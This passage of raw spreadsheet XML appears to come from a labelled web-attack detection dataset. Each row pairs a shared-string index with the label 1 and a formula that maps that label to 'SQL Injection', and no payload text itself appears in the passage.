        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18928" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18928" s="1" t="s">
        <v>17438</v>
      </c>
      <c r="B18928">
        <v>1</v>
      </c>
      <c r="C18928" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18929" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18929" s="1" t="s">
        <v>12655</v>
      </c>
      <c r="B18929">
        <v>1</v>
      </c>
      <c r="C18929" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18930" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18930" s="1" t="s">
        <v>24477</v>
      </c>
      <c r="B18930">
        <v>1</v>
      </c>
      <c r="C18930" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18931" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18931" s="1" t="s">
        <v>17584</v>
      </c>
      <c r="B18931">
        <v>1</v>
      </c>
      <c r="C18931" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18932" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18932" s="1" t="s">
        <v>25717</v>
      </c>
      <c r="B18932">
        <v>1</v>
      </c>
      <c r="C18932" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18933" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18933" s="1" t="s">
        <v>13575</v>
      </c>
      <c r="B18933">
        <v>1</v>
      </c>
      <c r="C18933" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18934" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18934" s="1" t="s">
        <v>13482</v>
      </c>
      <c r="B18934">
        <v>1</v>
      </c>
      <c r="C18934" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18935" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18935" s="1" t="s">
        <v>19415</v>
      </c>
      <c r="B18935">
        <v>1</v>
      </c>
      <c r="C18935" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18936" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18936" s="1" t="s">
        <v>17587</v>
      </c>
      <c r="B18936">
        <v>1</v>
      </c>
      <c r="C18936" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18937" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18937" s="1" t="s">
        <v>25851</v>
      </c>
      <c r="B18937">
        <v>1</v>
      </c>
      <c r="C18937" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18938" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18938" s="1" t="s">
        <v>18028</v>
      </c>
      <c r="B18938">
        <v>1</v>
      </c>
      <c r="C18938" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18939" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18939" s="1" t="s">
        <v>17345</v>
      </c>
      <c r="B18939">
        <v>1</v>
      </c>
      <c r="C18939" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18940" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18940" s="1" t="s">
        <v>25695</v>
      </c>
      <c r="B18940">
        <v>1</v>
      </c>
      <c r="C18940" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18941" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18941" s="1" t="s">
        <v>16967</v>
      </c>
      <c r="B18941">
        <v>1</v>
      </c>
      <c r="C18941" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18942" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18942" s="1" t="s">
        <v>18981</v>
      </c>
      <c r="B18942">
        <v>1</v>
      </c>
      <c r="C18942" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18943" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18943" s="1" t="s">
        <v>18850</v>
      </c>
      <c r="B18943">
        <v>1</v>
      </c>
      <c r="C18943" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18944" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18944" s="1" t="s">
        <v>15969</v>
      </c>
      <c r="B18944">
        <v>1</v>
      </c>
      <c r="C18944" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18945" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18945" s="1" t="s">
        <v>16211</v>
      </c>
      <c r="B18945">
        <v>1</v>
      </c>
      <c r="C18945" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18946" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18946" s="1" t="s">
        <v>18397</v>
      </c>
      <c r="B18946">
        <v>1</v>
      </c>
      <c r="C18946" s="7" t="str">
        <f t="shared" si="295"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18947" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18947" s="1" t="s">
        <v>12524</v>
      </c>
      <c r="B18947">
        <v>1</v>
      </c>
      <c r="C18947" s="7" t="str">
        <f t="shared" ref="C18947:C19010" si="296">IF(B18947=0,"No Attack", IF(B18947=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18948" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18948" s="1" t="s">
        <v>16830</v>
      </c>
      <c r="B18948">
        <v>1</v>
      </c>
      <c r="C18948" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18949" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18949" s="1" t="s">
        <v>15579</v>
      </c>
      <c r="B18949">
        <v>1</v>
      </c>
      <c r="C18949" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18950" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18950" s="1" t="s">
        <v>13715</v>
      </c>
      <c r="B18950">
        <v>1</v>
      </c>
      <c r="C18950" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18951" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18951" s="1" t="s">
        <v>15835</v>
      </c>
      <c r="B18951">
        <v>1</v>
      </c>
      <c r="C18951" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18952" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18952" s="1" t="s">
        <v>14989</v>
      </c>
      <c r="B18952">
        <v>1</v>
      </c>
      <c r="C18952" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18953" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18953" s="1" t="s">
        <v>13713</v>
      </c>
      <c r="B18953">
        <v>1</v>
      </c>
      <c r="C18953" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18954" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18954" s="1" t="s">
        <v>19214</v>
      </c>
      <c r="B18954">
        <v>1</v>
      </c>
      <c r="C18954" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18955" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18955" s="1" t="s">
        <v>17989</v>
      </c>
      <c r="B18955">
        <v>1</v>
      </c>
      <c r="C18955" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18956" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18956" s="1" t="s">
        <v>14586</v>
      </c>
      <c r="B18956">
        <v>1</v>
      </c>
      <c r="C18956" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18957" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18957" s="1" t="s">
        <v>15981</v>
      </c>
      <c r="B18957">
        <v>1</v>
      </c>
      <c r="C18957" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18958" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18958" s="1" t="s">
        <v>14926</v>
      </c>
      <c r="B18958">
        <v>1</v>
      </c>
      <c r="C18958" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18959" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18959" s="1" t="s">
        <v>18810</v>
      </c>
      <c r="B18959">
        <v>1</v>
      </c>
      <c r="C18959" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18960" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18960" s="1" t="s">
        <v>13286</v>
      </c>
      <c r="B18960">
        <v>1</v>
      </c>
      <c r="C18960" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18961" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18961" s="1" t="s">
        <v>14416</v>
      </c>
      <c r="B18961">
        <v>1</v>
      </c>
      <c r="C18961" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18962" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18962" s="1" t="s">
        <v>14615</v>
      </c>
      <c r="B18962">
        <v>1</v>
      </c>
      <c r="C18962" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18963" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18963" s="1" t="s">
        <v>12139</v>
      </c>
      <c r="B18963">
        <v>1</v>
      </c>
      <c r="C18963" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18964" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18964" s="1" t="s">
        <v>18836</v>
      </c>
      <c r="B18964">
        <v>1</v>
      </c>
      <c r="C18964" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18965" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18965" s="1" t="s">
        <v>15645</v>
      </c>
      <c r="B18965">
        <v>1</v>
      </c>
      <c r="C18965" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18966" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18966" s="1" t="s">
        <v>14621</v>
      </c>
      <c r="B18966">
        <v>1</v>
      </c>
      <c r="C18966" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18967" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18967" s="1" t="s">
        <v>24722</v>
      </c>
      <c r="B18967">
        <v>1</v>
      </c>
      <c r="C18967" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18968" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18968" s="1" t="s">
        <v>25386</v>
      </c>
      <c r="B18968">
        <v>1</v>
      </c>
      <c r="C18968" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18969" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18969" s="1" t="s">
        <v>18889</v>
      </c>
      <c r="B18969">
        <v>1</v>
      </c>
      <c r="C18969" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18970" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18970" s="1" t="s">
        <v>18985</v>
      </c>
      <c r="B18970">
        <v>1</v>
      </c>
      <c r="C18970" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18971" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18971" s="1" t="s">
        <v>17248</v>
      </c>
      <c r="B18971">
        <v>1</v>
      </c>
      <c r="C18971" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18972" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18972" s="1" t="s">
        <v>17207</v>
      </c>
      <c r="B18972">
        <v>1</v>
      </c>
      <c r="C18972" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18973" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18973" s="1" t="s">
        <v>19428</v>
      </c>
      <c r="B18973">
        <v>1</v>
      </c>
      <c r="C18973" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18974" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18974" s="1" t="s">
        <v>12080</v>
      </c>
      <c r="B18974">
        <v>1</v>
      </c>
      <c r="C18974" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18975" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18975" s="1" t="s">
        <v>12186</v>
      </c>
      <c r="B18975">
        <v>1</v>
      </c>
      <c r="C18975" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18976" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18976" s="1" t="s">
        <v>14908</v>
      </c>
      <c r="B18976">
        <v>1</v>
      </c>
      <c r="C18976" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18977" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18977" s="1" t="s">
        <v>25462</v>
      </c>
      <c r="B18977">
        <v>1</v>
      </c>
      <c r="C18977" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18978" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18978" s="1" t="s">
        <v>12197</v>
      </c>
      <c r="B18978">
        <v>1</v>
      </c>
      <c r="C18978" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18979" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18979" s="1" t="s">
        <v>17453</v>
      </c>
      <c r="B18979">
        <v>1</v>
      </c>
      <c r="C18979" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18980" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18980" s="1" t="s">
        <v>26593</v>
      </c>
      <c r="B18980">
        <v>1</v>
      </c>
      <c r="C18980" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18981" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18981" s="1" t="s">
        <v>12293</v>
      </c>
      <c r="B18981">
        <v>1</v>
      </c>
      <c r="C18981" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18982" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18982" s="1" t="s">
        <v>16192</v>
      </c>
      <c r="B18982">
        <v>1</v>
      </c>
      <c r="C18982" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18983" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18983" s="1" t="s">
        <v>16633</v>
      </c>
      <c r="B18983">
        <v>1</v>
      </c>
      <c r="C18983" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18984" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18984" s="1" t="s">
        <v>14255</v>
      </c>
      <c r="B18984">
        <v>1</v>
      </c>
      <c r="C18984" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18985" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18985" s="1" t="s">
        <v>24720</v>
      </c>
      <c r="B18985">
        <v>1</v>
      </c>
      <c r="C18985" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18986" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18986" s="1" t="s">
        <v>19416</v>
      </c>
      <c r="B18986">
        <v>1</v>
      </c>
      <c r="C18986" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18987" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18987" s="1" t="s">
        <v>14020</v>
      </c>
      <c r="B18987">
        <v>1</v>
      </c>
      <c r="C18987" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18988" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18988" s="1" t="s">
        <v>18853</v>
      </c>
      <c r="B18988">
        <v>1</v>
      </c>
      <c r="C18988" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18989" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18989" s="1" t="s">
        <v>15779</v>
      </c>
      <c r="B18989">
        <v>1</v>
      </c>
      <c r="C18989" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18990" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18990" s="1" t="s">
        <v>16805</v>
      </c>
      <c r="B18990">
        <v>1</v>
      </c>
      <c r="C18990" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18991" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18991" s="1" t="s">
        <v>18557</v>
      </c>
      <c r="B18991">
        <v>1</v>
      </c>
      <c r="C18991" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18992" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18992" s="1" t="s">
        <v>26079</v>
      </c>
      <c r="B18992">
        <v>1</v>
      </c>
      <c r="C18992" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18993" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18993" s="1" t="s">
        <v>17766</v>
      </c>
      <c r="B18993">
        <v>1</v>
      </c>
      <c r="C18993" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18994" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18994" s="1" t="s">
        <v>16209</v>
      </c>
      <c r="B18994">
        <v>1</v>
      </c>
      <c r="C18994" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18995" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18995" s="1" t="s">
        <v>15634</v>
      </c>
      <c r="B18995">
        <v>1</v>
      </c>
      <c r="C18995" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18996" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18996" s="1" t="s">
        <v>16377</v>
      </c>
      <c r="B18996">
        <v>1</v>
      </c>
      <c r="C18996" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18997" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18997" s="1" t="s">
        <v>19163</v>
      </c>
      <c r="B18997">
        <v>1</v>
      </c>
      <c r="C18997" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18998" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18998" s="1" t="s">
        <v>17497</v>
      </c>
      <c r="B18998">
        <v>1</v>
      </c>
      <c r="C18998" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18999" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18999" s="1" t="s">
        <v>25651</v>
      </c>
      <c r="B18999">
        <v>1</v>
      </c>
      <c r="C18999" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19000" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19000" s="1" t="s">
        <v>25664</v>
      </c>
      <c r="B19000">
        <v>1</v>
      </c>
      <c r="C19000" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19001" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19001" s="1" t="s">
        <v>19650</v>
      </c>
      <c r="B19001">
        <v>1</v>
      </c>
      <c r="C19001" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19002" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19002" s="1" t="s">
        <v>14945</v>
      </c>
      <c r="B19002">
        <v>1</v>
      </c>
      <c r="C19002" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19003" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19003" s="1" t="s">
        <v>13353</v>
      </c>
      <c r="B19003">
        <v>1</v>
      </c>
      <c r="C19003" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19004" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19004" s="1" t="s">
        <v>13754</v>
      </c>
      <c r="B19004">
        <v>1</v>
      </c>
      <c r="C19004" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19005" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19005" s="1" t="s">
        <v>14298</v>
      </c>
      <c r="B19005">
        <v>1</v>
      </c>
      <c r="C19005" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19006" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19006" s="1" t="s">
        <v>14316</v>
      </c>
      <c r="B19006">
        <v>1</v>
      </c>
      <c r="C19006" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19007" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19007" s="1" t="s">
        <v>24803</v>
      </c>
      <c r="B19007">
        <v>1</v>
      </c>
      <c r="C19007" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19008" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19008" s="1" t="s">
        <v>14401</v>
      </c>
      <c r="B19008">
        <v>1</v>
      </c>
      <c r="C19008" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19009" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19009" s="1" t="s">
        <v>14167</v>
      </c>
      <c r="B19009">
        <v>1</v>
      </c>
      <c r="C19009" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19010" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19010" s="1" t="s">
        <v>13229</v>
      </c>
      <c r="B19010">
        <v>1</v>
      </c>
      <c r="C19010" s="7" t="str">
        <f t="shared" si="296"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19011" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19011" s="1" t="s">
        <v>25833</v>
      </c>
      <c r="B19011">
        <v>1</v>
      </c>
      <c r="C19011" s="7" t="str">
        <f t="shared" ref="C19011:C19074" si="297">IF(B19011=0,"No Attack", IF(B19011=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19012" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19012" s="1" t="s">
        <v>18571</v>
      </c>
      <c r="B19012">
        <v>1</v>
      </c>
      <c r="C19012" s="7" t="str">
        <f t="shared" si="297"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19013" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19013" s="1" t="s">
        <v>17062</v>
      </c>
      <c r="B19013">
        <v>1</v>
      </c>
      <c r="C19013" s="7" t="str">
        <f t="shared" si="297"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19014" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19014" s="1" t="s">
        <v>13354</v>
      </c>
      <c r="B19014">
        <v>1</v>
      </c>
      <c r="C19014" s="7" t="str">
        <f t="shared" si="297"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19015" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19015" s="1" t="s">
        <v>18183</v>
      </c>
      <c r="B19015">
        <v>1</v>
      </c>
      <c r="C19015" s="7" t="str">
        <f t="shared" si="297"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19016" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19016" s="1" t="s">
        <v>25513</v>
      </c>
      <c r="B19016">
        <v>1</v>
      </c>
      <c r="C19016" s="7" t="str">
        <f t="shared" si="297"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19017" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19017" s="1" t="s">
        <v>17738</v>
      </c>
      <c r="B19017">
        <v>1</v>
      </c>
      <c r="C19017" s="7" t="str">
        <f t="shared" si="297"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19018" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19018" s="1" t="s">
        <v>13202</v>
      </c>
      <c r="B19018">
        <v>1</v>
      </c>
      <c r="C19018" s="7" t="str">
        <f t="shared" si="297"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19019" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19019" s="1" t="s">
        <v>17211</v>
      </c>
      <c r="B19019">
        <v>1</v>
      </c>
      <c r="C19019" s="7" t="str">
        <f t="shared" si="297"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19020" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19020" s="1" t="s">
        <v>19339</v>
      </c>
      <c r="B19020">
        <v>1</v>
      </c>
      <c r="C19020" s="7" t="str">
        <f t="shared" si="297"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19021" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19021" s="1" t="s">
        <v>16505</v>
      </c>
      <c r="B19021">
        <v>1</v>
      </c>
      <c r="C19021" s="7" t="str">
        <f t="shared" si="297"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19022" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19022" s="1" t="s">
        <v>13911</v>
      </c>
      <c r="B19022">
        <v>1</v>
      </c>
      <c r="C19022" s="7" t="str">
        <f t="shared" si="297"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19023" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19023" s="1" t="s">
        <v>13292</v>
      </c>
      <c r="B19023">
        <v>1</v>
      </c>
      <c r="C19023" s="7" t="str">
        <f t="shared" si="297"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19024" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19024" s="1" t="s">
        <v>14735</v>
      </c>
      <c r="B19024">
        <v>1</v>
      </c>
      <c r="C19024" s="7" t="str">
        <f t="shared" si="297"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19025" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19025" s="1" t="s">
        <v>25339</v>
      </c>
      <c r="B19025">
        <v>1</v>
      </c>
      <c r="C19025" s="7" t="str">
        <f t="shared" si="297"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19026" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19026" s="1" t="s">
        <v>15098</v>
      </c>
      <c r="B19026">
        <v>1</v>
      </c>
      <c r="C19026" s="7" t="str">
        <f t="shared" si="297"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19027" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19027" s="1" t="s">
        <v>18570</v>
      </c>
      <c r="B19027">
        <v>1</v>
      </c>
      <c r="C19027" s="7" t="str">
        <f t="shared" si="297"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19028" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19028" s="1" t="s">
        <v>12348</v>
      </c>
      <c r="B19028">
        <v>1</v>
      </c>
      <c r="C19028" s="7" t="str">
        <f t="shared" si="297"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19029" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19029" s="1" t="s">
        <v>25783</v>
      </c>
      <c r="B19029">
        <v>1</v>
      </c>
      <c r="C19029" s="7" t="str">
        <f t="shared" si="297"/>
        <v>SQL Injection</v>
      </c>
    </row>
